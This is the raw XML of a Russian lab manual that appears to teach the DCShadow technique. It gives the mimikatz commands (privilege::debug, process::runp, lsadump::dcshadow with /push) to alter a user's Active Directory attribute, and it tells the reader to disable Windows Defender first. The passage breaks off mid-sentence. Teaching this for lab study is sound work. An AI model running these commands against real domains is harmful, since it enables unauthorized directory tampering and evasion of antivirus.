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7107034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</w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00615706" w:rsidRDefault="0061570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Название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15706" w:rsidRDefault="00615706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Атака на домен с использованием утилиты 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n-US"/>
                                      </w:rPr>
                                      <w:t>mimikatz</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w:rsidR="00615706" w:rsidRDefault="0061570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Аннотация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615706" w:rsidRDefault="0061570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61570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В этом мануале рассмотрен будет простой пример работы с утилитой </w:t>
                                    </w:r>
                                    <w:proofErr w:type="spellStart"/>
                                    <w:r w:rsidRPr="0061570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mimikatz</w:t>
                                    </w:r>
                                    <w:proofErr w:type="spellEnd"/>
                                    <w:r w:rsidRPr="0061570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, а именно, изменение атрибута </w:t>
                                    </w:r>
                                    <w:proofErr w:type="spellStart"/>
                                    <w:r w:rsidRPr="0061570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description</w:t>
                                    </w:r>
                                    <w:proofErr w:type="spellEnd"/>
                                    <w:r w:rsidRPr="0061570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у объекта пользователя.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Прямоугольник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Название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15706" w:rsidRDefault="00615706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Атака на домен с использованием утилиты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n-US"/>
                                </w:rPr>
                                <w:t>mimikatz</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p w:rsidR="00615706" w:rsidRDefault="0061570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Аннотация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615706" w:rsidRDefault="0061570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61570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В этом мануале рассмотрен будет простой пример работы с утилитой </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r w:rsidRPr="0061570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mimikatz</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r w:rsidRPr="0061570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, а именно, изменение атрибута </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r w:rsidRPr="0061570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description</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r w:rsidRPr="0061570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у объекта пользователя.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Прямоугольник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Подзаголовок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615706" w:rsidRDefault="00615706">
                                    <w:pPr>
                                      <w:pStyle w:val="a5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Автор: Скрыльников Вячеслав Владимирович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Прямоугольник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Подзаголовок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15706" w:rsidRDefault="00615706">
                              <w:pPr>
                                <w:pStyle w:val="a5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Автор: Скрыльников Вячеслав Владимирович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15706" w:rsidRDefault="00615706"/>
        <w:p w:rsidR="00615706" w:rsidRDefault="00615706">
          <w:pPr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br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00615706" w:rsidRPr="00615706" w:rsidRDefault="00615706" w:rsidP="00AD7605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615706">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Часть 1. Настройка утилиты </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00615706">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00615706">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD7605" w:rsidRPr="00AD7605" w:rsidRDefault="00AD7605" w:rsidP="00AD76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атаки мы используем машину на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D76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введённую в домен. Скачиваем на неё архив с утилитой, распаковываем в папку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D7605">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>:\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mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00615706" w:rsidRDefault="00AD7605" w:rsidP="00AD76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же желательно отключить </w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">защитник </w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00D07A80" w:rsidRPr="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> или добавить папку </w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00D07A80" w:rsidRPr="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>:\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D07A80" w:rsidRPr="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>в исключения, так как он считает эту утилиту вирусом, и сразу удалит исполняемый файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615706" w:rsidRDefault="006157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D7605" w:rsidRPr="00615706" w:rsidRDefault="00615706" w:rsidP="00AD7605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615706">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Часть 2. Инъекция в базу </w:t>
      </w:r>
      <w:r w:rsidRPr="00615706">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00615706">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D07A80" w:rsidRDefault="00615706" w:rsidP="00AD76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D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ткрываем </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D07A80" w:rsidRPr="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">от имени администратора (один из способов: нажать сочетание клавиш </w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r w:rsidR="00D07A80" w:rsidRPr="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00D07A80" w:rsidRPr="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ввести </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D07A80" w:rsidRPr="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и нажать сочетание </w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ctrl</w:t>
      </w:r>
      <w:r w:rsidR="00D07A80" w:rsidRPr="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shift</w:t>
      </w:r>
      <w:r w:rsidR="00D07A80" w:rsidRPr="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:r w:rsidR="00D07A80" w:rsidRPr="00D07A8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D07A80" w:rsidRDefault="00D07A80" w:rsidP="00AD760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Запускаем утилиту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mimikatz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D07A80" w:rsidRPr="00426C15" w:rsidRDefault="00D07A80" w:rsidP="00D07A80">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/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0" w:color="A6A6A6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="120" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="482"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>C:\mimikatz\x64\mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D07A80" w:rsidRDefault="00D07A80" w:rsidP="00AD7605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D07A80" w:rsidRDefault="00D07A80" w:rsidP="00AD76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(Если файл не найден, его удалил </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>антивирусник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07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D07A80" w:rsidRPr="00D07A80" w:rsidRDefault="00D07A80" w:rsidP="00AD76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Открывается утилита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mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D07A80" w:rsidRPr="00D07A80" w:rsidRDefault="00D07A80" w:rsidP="00AD76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Первым делом необходимо дать ей права на управление процессами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D07A80" w:rsidRPr="00426C15" w:rsidRDefault="00D07A80" w:rsidP="00D07A80">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/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0" w:color="A6A6A6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="120" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="482"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D07A80">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D07A80" w:rsidRDefault="00D07A80" w:rsidP="00AD7605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRDefault="00AD6368" w:rsidP="00AD76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запускаем вторую консоль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mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD63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командой:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRPr="00AD6368" w:rsidRDefault="00AD6368" w:rsidP="00AD6368">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/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0" w:color="A6A6A6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="120" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="482"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6368">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6368">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6368">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>runp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRPr="00AD6368" w:rsidRDefault="00AD6368" w:rsidP="00AD7605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D07A80" w:rsidRDefault="00AD6368" w:rsidP="00AD76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отрывшейся консоли следующей командой мы указываем объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6368">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6368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ат</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>рибут</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> которого хотим изменить и после сам атрибут</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6368">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attribute</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6368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его значение</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6368">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRPr="00AD6368" w:rsidRDefault="00AD6368" w:rsidP="00AD6368">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/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0" w:color="A6A6A6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="120" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="482"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6368">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>lsadump::dcshadow /stack /object:"CN=Gon,OU=Users,OU=Center,DC=demo,DC=lab" /attribute:description /value:changemeifyoucan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRDefault="00AD6368" w:rsidP="00AD7605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRDefault="00AD6368" w:rsidP="00AD76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далее запускаем команду на попытку изменения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRPr="00AD6368" w:rsidRDefault="00AD6368" w:rsidP="00AD6368">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/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0" w:color="A6A6A6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="120" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="482"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6368">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>lsadump::dcshadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRDefault="00AD6368" w:rsidP="00AD7605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B4A48" w:rsidRDefault="004B4A48" w:rsidP="00AD7605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRDefault="00AD6368" w:rsidP="00AD76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бы изменения применились, необходимо в первой консоли (через которую мы открыли вторую) выполнить следующую команду:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRPr="00AD6368" w:rsidRDefault="00AD6368" w:rsidP="00AD6368">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/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0" w:color="A6A6A6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="120" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="482"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6368">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>lsadump::dcshadow /push</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRPr="00AD6368" w:rsidRDefault="00AD6368" w:rsidP="00AD7605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD6368" w:rsidRDefault="004B4A48" w:rsidP="00AD7605">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial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На это всё. Вы можете убедиться</w:t>
      </w:r>
      <w:r w:rsidR="00C45B34" w:rsidRPr="00C45B3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 атрибут был изменён, перейдя в ваш </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r w:rsidRPr="004B4A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C45B34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">выбрав изменяемый объект (в моём случае пользователь </w:t>
      </w:r>
      <w:r w:rsidR="00C45B34" w:rsidRPr="00AD6368">
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Calibri" w:hAnsi="Book Antiqua" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="28"/>
